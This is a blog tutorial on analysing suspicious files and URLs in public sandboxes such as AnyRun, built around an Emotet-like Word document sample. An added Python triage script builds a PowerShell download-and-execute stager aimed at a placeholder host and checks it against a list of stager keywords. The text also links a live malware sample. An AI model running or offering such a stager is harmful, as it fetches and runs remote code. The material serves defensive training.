
Using OSINT Sandboxes To Fill The Gaps



Authors: Anaïs Sidhu and Samuel Cameron

In this article we will discuss what an OSINT Sandbox is, how it is used practically, and how it can help to accelerate your learning and fill the gaps in your security expertise. 

*The authors do not encourage the download of malware on any device that holds valuable data assets.*

*The views and opinions of this blog are the authors’ alone*

Background


We recently surveyed our network on LinkedIn to determine what they thought to be the most valuable skill when working in a Security Operations Center (SOC). Provided the options of Malware Analysis Experience, Threat Intelligence Experience, Scripting Experience, and Red Team Experience, 45 percent of respondents felt that Threat Intelligence Experience is most valuable. Malware Analysis followed with 32 percent respondent favorability, while Scripting Experience and Red Team Experience received 13 percent and 11 percent of the poll votes, respectively. With responses dispersed across the four options, no single option stands out significantly. So, where should someone aspiring to work in cybersecurity start?

With all of the things that modern day security analysts and researchers are supposed to know, it can be quite confusing and a bit overwhelming when it comes time to determine what to really dig into. Here are just a few things you should know when doing security work: Indicators of Compromise (IOC), Indicators of Attack (IOA), net.exe, Sysinternals suite of tools, event log analysis, encoding schemes employed by malware, and anti-sandboxing mechanisms. Needless to say, that list could extend over several more pages. A lack of knowledge in any of these areas can be seen as a ‘barrier to entry’ and can really stop people from being confident in their abilities and from applying to security jobs.

What if we could integrate years of security research and expertise at the click of a button? What if we didn't have to know the ins and outs of the above topics to be effective and efficient in the realm of security operations? What if we had tools which, given a sample to study, could apply the aforementioned skills, so that all we had to focus on was interpreting the results they output?

It turns out that there is a mechanism to help us achieve just that. A sandbox, as it relates to cybersecurity, is a safe environment where files and URLs (referred to henceforward as ‘samples’) are detonated/executed in order to see what they do. It’s like playing with a live sample of the malware or malicious file, poking it, and seeing everything that it would try to do on a real system. The crucial property is that you are able to detonate the malicious sample without risking it affecting other systems.

Now that you have an idea of the benefits and fun possible within the scope of a sandbox, where do you get one? The good news is they are not expensive. You can get some pretty decent sandbox software, such as Cuckoo, which is free to download and use. If you have a dedicated system and a lot of free time, this is a pretty good option. However, setting up a lab can be not only tedious but also downright difficult, especially if you are just starting out and trying to break into the industry.

Fortunately, Open-Source Intelligence (OSINT) Sandboxes provide a solution. OSINT is being used very loosely here to refer to the practical use of Open-Source Intelligence in automated malware analysis using sandboxes. These sandboxes have both free and premium paid features. Let’s discuss some free options.

There are more than a few publicly available sandboxes that security analysts can leverage free of charge, of note: AnyRun and Hybrid Analysis. Honorable mentions go to JoeSandbox and Malwr. A large portion of what remains of this blog will focus on AnyRun with a little bit of Hybrid Analysis for contrast. 

Warning before we get started: The following tools are meant to detonate potentially unsafe files in a safe environment. Any file or URL that you upload to these sites should be treated as if you are making the detonation report publicly available for all to see (the entire world). With that in mind, it is strongly encouraged that whatever file or URL you intend to upload does NOT contain sensitive, personal, company-affiliated, or in any way proprietary information which would be considered a breach of data if leaked on the internet.

One more thing: There are ways to actually download samples from these sites. You would have to intentionally and purposefully click the ‘Download’ or ‘Get Sample’ button in the tools in order to do so. BE CAREFUL as this is actual malware and will infect your system should you choose to download the sample and run it. Simply viewing the reports and such will NOT download the malware in any way. 

If you want to follow along with the same sample that we used, please visit this link:

https://app.any.run/tasks/3cc5750e-958e-4868-8dc9-5b38fb75cab9

Detonating Files

Now we get into the fun stuff. Pretend you have a piece of malware, or at the very least, a piece of software that you would like to test. Perhaps that is a suspicious file that you received from a random email address with a subject field Invoice #00456. Alternatively, you can submit a URL if you so choose as opposed to a file, for example: hxxp://www.helloworld[.]com/en_us/portal/12345. Either way, you want to play around with the file or URL safely to ensure it doesn’t do anything fishy, pun intended. 

At this point, you might be thinking “I’m a newbie, I don’t even know half of what to look for to call a file suspicious.” Or, maybe you’re thinking “well I do have years of experience in security as an auditor, but I don’t have any malware analysis experience and little threat intelligence experience.” Still others may think “I am the furthest thing from a scripter or developer as one can be – I wouldn’t even know what a malicious piece of code looks like!” To those of you thinking along those lines: don’t panic. These tools DO THAT WORK FOR YOU. The only ask of you, as an opportunity to grow, is that you learn how to READ and INTERPRET sandbox findings. It sounds like a daunting task, but really, it’s not bad. So, let’s dive in.

Submitting your sample

Start with your piece of software or URL and visit the sandbox of your choosing. For this example, we’ll pick AnyRun. When you visit app.any.run, you’re brought to the following screen:

Figure 1: AnyRun Upload Page


Figure 2: Hybrid Analysis Upload Page for Contrast

Clicking around the different buttons will give you a feel for the varying functionalities. There are far too many options and features to discuss in complete detail here, so we’ll cover the most important ones. Outlined above in red [Figure 1], you should see a button for ‘New Task’; this is the button we’ll use to submit our sample. We will not cover ‘Public Submissions’ in this blog, but stay tuned as this topic may be in a future blog. In short, Public Submissions are where you can find old detonations that anyone on AnyRun has submitted up to ‘X’ number of days ago.

Next, you’ll click on ‘New Task’ and get ready to upload your file or submit your URL. 

Note: If you are not already logged into your free account then you will be prompted to do so when you press ‘New Task’. Otherwise, you will see the following screen:

Figure 3: AnyRun Submit Sample Page

The options may seem a little overwhelming, so let’s break it down:


When using a free account, you will only be able to select the Windows 7 32-bit operating system. Since this is sufficient for most malware, we will proceed with this setting. You will not be able to edit anything in the top half of the submit sample window. Options in the bottom right quadrant are also largely unchangeable when using a free account; however, these will almost always be left alone when submitting a sample. That being said, if you’d like to explore more options for a more advanced analysis, you can do so by upgrading to the premium version.

Click on ‘Choose a File’ [see red box in Figure 3]. A box will appear, allowing you to select the file you’d like to upload. It’s really that simple. Optionally, if you look at the green outlined box in Figure 3, you can see it gives you the option to select which directory to execute the file from. This is useful because some malware checks which directory it runs from; this is mostly an anti-sandbox technique. This option can be useful in some more advanced use cases, but for the most part you are good to leave it at the default ‘Temp directory’. (As said before, feel free to modify and click the buttons to really get to know the platform.) When you have your settings ready, go ahead and click the ‘Run’ button at the bottom right.

When submitting a URL, simply paste the fully qualified URL into the ‘Type URL to File’ field. Make sure that you have either HTTP:// or HTTPS:// included, as it will not run without one of those prepended to the URL. If the link leads to a file, you can click the button that says ‘Download with User Agent’; if not, you can click the button that says ‘Open in Browser’. Selecting the ‘Open in Browser’ option is useful as it allows you to see the website, but either option will work to inspect the URL.

Congratulations! Your sample is running in a sandbox! Now, before you go adding ‘Threat Hunter’ to your resume, let’s ensure that you can talk about the output of the sandbox detonation a bit. Besides, the most important piece of the sandbox detonation is yet to be seen.

While the malware is running

Now that your malware is running, let’s highlight some of the most useful features. The length of time that your detonation runs can affect what your malware does. Some malware will use a (mostly) sandbox evasion technique of waiting for ‘X’ number of minutes before performing any harmful action on the system. This technique hopes that whatever sandbox is running, or the analyst running it, gets overly anxious and cuts off the sandbox after a minute of inactivity, when really the bad stuff was just waiting a couple of minutes before executing some malicious code. The default run time on AnyRun is one minute; however, it can be extended up to four times, one minute each, using the button outlined in green (see Figure 4 below). The usefulness of this button may well make it your favorite button once you get into sandboxing a bit more.

It is also worth noting that you can actually interact with the sample in the window where you see your file open up. You can interact with it the same way that you would do things on your computer at home. For instance, we may respond ‘Yes’ to the popup shown in Figure 4 below.

Figure 4: AnyRun Running the Sample


All in all, sandboxes like the one shown here are mostly dynamic, meaning that the majority of the analysis is automated and tracked by the actual sandbox software itself. As the sample runs, AnyRun is monitoring for any unusual or suspicious behavior and will outline those things in the report. For instance, if you look below the detonation window, you will see a section titled ‘HTTP Requests’. Any HTTP activity conducted after the file was detonated will show up here. Moreover, indicators like the flame icon under the ‘Rep’ column indicate that AnyRun has identified that URL or domain as malicious. This already allows us to reap the benefits of using OSINT sandboxes as we have automated malware analysis AND threat intelligence right in front of our eyes, while all we did was submit the sample. 

Feel free to click around in the detonation window while your sample is running. AnyRun is logging all processes created and will show those in the pane to the right. These will become very interesting to you as your malware analysis abilities progress. You’ll soon be able to pick out processes and commands that appear suspicious or malicious without AnyRun giving you the hints. (Look in Figure 4, at the right pane. You see where Powershell.exe is executing a command? That box has an orange left border, which means that AnyRun thinks that process or command is suspicious. The suspicion makes sense, as Microsoft Word calling an encoded PowerShell command that causes outbound HTTP activity isn’t typical.)


After the Detonation / Reviewing the Report

The after-detonation report is perhaps the most important piece of all. After all, if the report is not detailed and not easy to read, then we would all have to be experts in malware analysis, scripting, and threat intelligence in order to read the raw event data. Lucky for us, this is not the case in our sandbox technologies. 

After your submission, you should see something similar to the report shown below:

Figure 5: AnyRun Detonation Report

Figure 6: Hybrid Analysis Detonation Report for Contrast

There are 3 very important panes that we will discuss here. (All shown in Figure 5)

  1. The bottom pane right under the detonation window: This is where we see network activity that happened during the detonation of the sample. If you detonated a URL, by default, you should see that URL in the ‘HTTP Requests’ tab of this pane. If you detonated a file, you should see any network connections that were made as a result of that file being detonated (worth noting that if you went into the sandbox and performed any HTTP requests via the web browser, those will also show up here). Also, like any good sandbox engine, alongside the URL/IP it gives you a column for “Rep”. This is where it will tell you if it considers that artifact to be benign, unknown, or malicious. You can also download the packet capture from this pane should you choose to do a deeper analysis of the network connections. As pictured in Figure 5 with the red arrow, PowerShell was used to make an outbound request to a strange URL. This is rightfully flagged as suspicious.

  2. The top right pane: This pane gives you the name of the sample that you submitted, the hashes, and some metadata about the sample. In addition to that, tags are added by the sandbox technology if it finds an artifact or activity that matches the Tactics, Techniques, or Procedures (TTPs) or Indicators of Compromise (IOCs) from known malware samples, like Emotet. Immediately, in the above example, we see tags that indicate that this Word document runs macros and that some activity in this detonation is indicative of Emotet malware. If you would like to see a quick breakout of the different IOCs, simply click the ‘IOC’ button in this pane to the right of ‘Get Sample’.

  3. The bottom right pane: This is likely going to be the most unfamiliar/foreign/worrisome one to beginners. That’s OK – looking at processes and services isn’t fun or exciting for anyone. The good news is, AnyRun is able to classify what it sees here as “Suspicious”, “Malicious”, or “No verdict”, so you don’t have to be an expert programmer to have a sense of what is happening with each process or command line seen. For example, in the above screenshot, we can see that Winword.exe was executed (a quick Google search shows that is the benign executable for Microsoft Word). We would expect to see that because our sample was a Microsoft Word document. After that, PowerShell was launched to run an encoded command (I know it is encoded based on the -e in the PowerShell command line; -e is short for -EncodedCommand, which takes a base64-encoded script). AnyRun outlines this process as ‘Suspicious’ by giving it an orange left border. Any process or command line it sees as ‘Suspicious’ will have that border.

What can we deduce from this report? 


When the Word document was opened it did a few things:

  1. Launched an encoded PowerShell command

  2. Made 3 outbound HTTP requests to strange websites, 2 of which are classified as malicious. 

Built-in threat intelligence tells us that this sample is similar to activity used by the Emotet malware. All in all, we can conclude this is not something we would want on our computer.
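The deductions above (an Office application spawning PowerShell, an encoded command line, and outbound requests with a reputation verdict) are the same checks an analyst repeats on every report. The following is an added example, not code from the article or from AnyRun, showing how those checks can be automated over the kind of data the process pane and HTTP Requests pane expose. The process list, the HTTP requests and the encoded script are all constructed to mirror the report described in the article; the host example.invalid and the pids are placeholders. It decodes the -e argument (base64 of UTF-16LE text, which is what PowerShell's -EncodedCommand expects), flags an Office-to-script-host parent/child relationship, and counts the requests the sandbox marked malicious.

```python
import base64
import re
from dataclasses import dataclass


@dataclass
class Process:
    pid: int
    ppid: int
    image: str      # executable name as shown in the process pane
    cmdline: str


@dataclass
class HttpRequest:
    pid: int
    url: str
    rep: str        # reputation column: "benign", "unknown" or "malicious"


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# -EncodedCommand and its common abbreviations, followed by the base64 blob.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Fragments that commonly show up in download-and-execute one-liners.
SUSPICIOUS_FRAGMENTS = ("downloadstring", "downloadfile", "net.webclient", "iex",
                        "invoke-expression", "windowstyle hidden", "frombase64string")


def encode_for_powershell(script):
    """Build what PowerShell -EncodedCommand takes: base64 of the UTF-16LE bytes."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script when the command line carries -e/-enc, else None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None     # malformed blob: treat as not decodable rather than crash


def triage(processes, requests):
    """Apply the article's three checks and return a verdict with its findings."""
    by_pid = {p.pid: p for p in processes}
    findings = []
    for p in processes:
        parent = by_pid.get(p.ppid)
        if parent and parent.image.lower() in OFFICE_APPS and p.image.lower() in SCRIPT_HOSTS:
            findings.append(f"{parent.image} spawned {p.image} (pid {p.pid})")
        decoded = decode_encoded_command(p.cmdline)
        if decoded is not None:
            findings.append(f"pid {p.pid} ran an encoded PowerShell command")
            hits = [f for f in SUSPICIOUS_FRAGMENTS if f in decoded.lower()]
            if hits:
                findings.append(f"decoded command contains: {', '.join(hits)}")
    suspicious = bool(findings)
    malicious = [r.url for r in requests if r.rep == "malicious"]
    findings.append(f"{len(requests)} outbound HTTP requests, {len(malicious)} flagged malicious")
    if malicious:
        verdict = "malicious"
    elif suspicious:
        verdict = "suspicious"
    else:
        verdict = "no verdict"
    return {"verdict": verdict, "findings": findings, "malicious_urls": malicious}


# Constructed stand-in for the report. The script only references a placeholder
# host; it is shaped like a stager but is not the real sample's command.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
SAMPLE_PROCESSES = [
    Process(1000, 1, "explorer.exe", "C:\\Windows\\explorer.exe"),
    Process(2000, 1000, "WINWORD.EXE", "\"C:\\Program Files\\Microsoft Office\\WINWORD.EXE\" Invoice.doc"),
    Process(3000, 2000, "powershell.exe", "powershell.exe -NoP -W Hidden -e " + encode_for_powershell(STAGER)),
]
SAMPLE_REQUESTS = [
    HttpRequest(3000, "http://example.invalid/a", "malicious"),
    HttpRequest(3000, "http://example.invalid/b", "malicious"),
    HttpRequest(3000, "http://example.invalid/c", "unknown"),
]

if __name__ == "__main__":
    result = triage(SAMPLE_PROCESSES, SAMPLE_REQUESTS)
    print("Verdict:", result["verdict"])
    for line in result["findings"]:
        print(" -", line)
```

On the constructed data this reports the Word-to-PowerShell spawn, the encoded command with its download-and-execute fragments, and three requests with two flagged malicious, so the verdict is "malicious", matching the conclusion drawn above. The decode step is the part worth keeping at hand: pasting the -e argument into it turns the opaque blob in the process pane into readable script.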

Conclusion


There seem to be many different ‘barriers to entry’ when it comes to security operations or researching malware. There are so many things that you are expected to know, with no clear indication of which may be the most critical to focus your time on. Features found in OSINT sandboxes can really be leveraged to fill those gaps for you.

Not a good scripter? AnyRun will let you know if it thinks the command line is Suspicious or Malicious. Not a good curator or sorter of Threat Intelligence? Hybrid Analysis will let you know if a contacted domain is known to be malicious or not. Do you lack practical experience with malware analysis? Let online sandboxing software take control of the analysis while you work on reading and interpreting the findings from the sandbox, into actionable deliverables for yourself and the business you support. 

Bonus: You can actually use the detonation reports from these tools to GUIDE your learning! If you see a process running and don’t know why it is considered suspicious, look it up and let it drive your research. If you see a domain classified as malicious, checking other OSINT sources (like talosintelligence.com or virustotal.com) can provide further information. Let the reports show you what you are unfamiliar with, and then research those things to fill your gaps. Accelerate your security skills using OSINT sandboxes.

About the authors: 


Anaïs Sidhu is a part of Cisco System’s Internet of Things Strategy & Planning team, supporting IoT products including the cybersecurity solution Cisco Cyber Vision.

https://twitter.com/AnaisSidhu

Samuel Cameron is the Team Lead for Cisco System’s Managed Security Service - Active Threat Analytics (ATA) in Raleigh, North Carolina.



Copyright CSNP - CyberSecurity NonProfit